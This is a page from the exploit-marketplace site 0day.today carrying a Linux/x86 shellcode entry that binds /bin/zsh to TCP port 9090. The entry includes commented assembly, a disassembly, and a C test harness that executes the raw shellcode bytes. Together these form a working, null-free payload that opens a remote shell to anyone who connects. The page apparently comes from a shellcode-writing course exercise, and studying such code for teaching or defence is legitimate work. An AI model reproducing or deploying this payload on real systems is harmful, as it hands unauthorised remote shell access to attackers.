0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)
/* ; ; Linux x86 ; Author: thryb ; Date: 13-07-16 ; Purpose: Bind /bin/zsh to TCP port 9090 ; Size: 96 bytes ; ID: SLAE-770 ; Git: https://www.github.com/thryb/SLAE-770 ; global _start section .text _start: xor eax, eax ; cleaning registers for sanity xor ebx, ebx xor edx, edx xor edi, edi ; 1 - create socket ; socket(AF_INET, SOCK_STREAM, 0); ; #define SYS_SOCKET 1 // sys_socket(2) push eax ; null mov al, 0x66 ; sys_socketcall = 102 mov bl, 0x1 ; socketcall() socket = 1 push byte 0x1 ; stack = 0, 1 push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET) mov ecx, esp ; mov stack ptr to ecx int 0x80 ; init ; 2 - Bind port ; bind(fd, (struct sockaddr *) &s_addr, 16); ; #define SYS_BIND 2 // sys_bind(2) xchg edi, eax ; transfer fd to edi mov al, 0x66 ; sys_socketcall = 102 pop ebx ; sys_bind = 2 pop esi ; = 1 push edx ; stack = [0] push word 0x8223 ; stack = [0, port_num] push word bx ; stack = [0, port_num, 2] push byte 16 ; stack = [0, port_num, 2], 16 push ecx ; stack = [0, port_num, 2], 16, pointer push edi ; stack = [0, port_num, 2], 16, *ptr, fd mov ecx, esp ; move stack ptr to ecx int 0x80 ; init ; 3 - Listen ; listen(fd, 1); ; #define SYS_LISTEN 4 // sys_listen(2) pop edx ; save fd mov al, 0x66 ; sys_socketcall = 102 add bl, 0x2 ; bl + 2 (bl 2 from bind) int 0x80 ; init ; 4 - Accept ; accept(fd, NULL, NULL); ; #define SYS_ACCEPT 5 // sys_accept(2) push eax ; 0 - NULL push eax ; 0 - NULL mov al, 0x66 ; sys_socketcall = 102 inc ebx ; make 5 for listen (4 from listen) push edx ; push fd on stack mov ecx, esp ; move stack ptr to ecx int 0x80 ; init ; 5 - dup ; sys_dup2 = 63 = 0x3f xchg eax, ebx ; ebx = fd / eax = 5 xor ecx, ecx ; NULL ecx add cl, 0x2 ; add 2 to counter dup2: ; STDIN, STDOUT, STDERR mov al, 0x3f ; sys_dup2 int 0x80 ; init dec cl ; decrement counter jns dup2 ; Jump on No Sign (Positive) ; 6 - execve /bin/zsh ; normal execve shell exec push eax push 0x68737a2f ; hsz/ push 0x6e69622f ; nib/ mov ebx, esp push eax mov edx, esp push ebx mov ecx, esp mov al, 0xb ; sys_execve (11) int 0x80 ; init ============================================================================================================ No NULL ./bind-sh-tcp-9090: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor %eax,%eax 8048062: 31 db xor %ebx,%ebx 8048064: 31 d2 xor %edx,%edx 8048066: 31 ff xor %edi,%edi 8048068: 50 push %eax 8048069: b0 66 mov $0x66,%al 804806b: b3 01 mov $0x1,%bl 804806d: 6a 01 push $0x1 804806f: 6a 02 push $0x2 8048071: 89 e1 mov %esp,%ecx 8048073: cd 80 int $0x80 8048075: 97 xchg %eax,%edi 8048076: b0 66 mov $0x66,%al 8048078: 5b pop %ebx 8048079: 5e pop %esi 804807a: 52 push %edx 804807b: 66 68 23 82 pushw $0x8223 804807f: 66 53 push %bx 8048081: 6a 10 push $0x10 8048083: 51 push %ecx 8048084: 57 push %edi 8048085: 89 e1 mov %esp,%ecx 8048087: cd 80 int $0x80 8048089: 5a pop %edx 804808a: b0 66 mov $0x66,%al 804808c: 80 c3 02 add $0x2,%bl 804808f: cd 80 int $0x80 8048091: 50 push %eax 8048092: 50 push %eax 8048093: b0 66 mov $0x66,%al 8048095: 43 inc %ebx 8048096: 52 push %edx 8048097: 89 e1 mov %esp,%ecx 8048099: cd 80 int $0x80 804809b: 93 xchg %eax,%ebx 804809c: 31 c9 xor %ecx,%ecx 804809e: 80 c1 02 add $0x2,%cl 080480a1 <dup2>: 80480a1: b0 3f mov $0x3f,%al 80480a3: cd 80 int $0x80 80480a5: fe c9 dec %cl 80480a7: 79 f8 jns 80480a1 <dup2> 80480a9: 50 push %eax 80480aa: 68 2f 7a 73 68 push $0x68737a2f 80480af: 68 2f 62 69 6e push $0x6e69622f 80480b4: 89 e3 mov %esp,%ebx 80480b6: 50 push %eax 80480b7: 89 e2 mov %esp,%edx 80480b9: 53 push %ebx 80480ba: 89 e1 mov %esp,%ecx 80480bc: b0 0b mov $0xb,%al 80480be: cd 80 int $0x80 */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\x31\xc0\x31\xdb\x31\xd2\x31\xff\x50\xb0\x66\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\xb0\x66\x5b\x5e\x52\x66\x68" // ==== Port ==== "\x23\x82" // ============== "\x66\x53\x6a\x10\x51\x57\x89\xe1\xcd\x80\x5a\xb0\x66\x80\xc3\x02\xcd\x80\x50\x50\xb0\x66\x43\x52\x89\xe1\xcd\x80\x93\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } # 0day.today [2024-12-25] #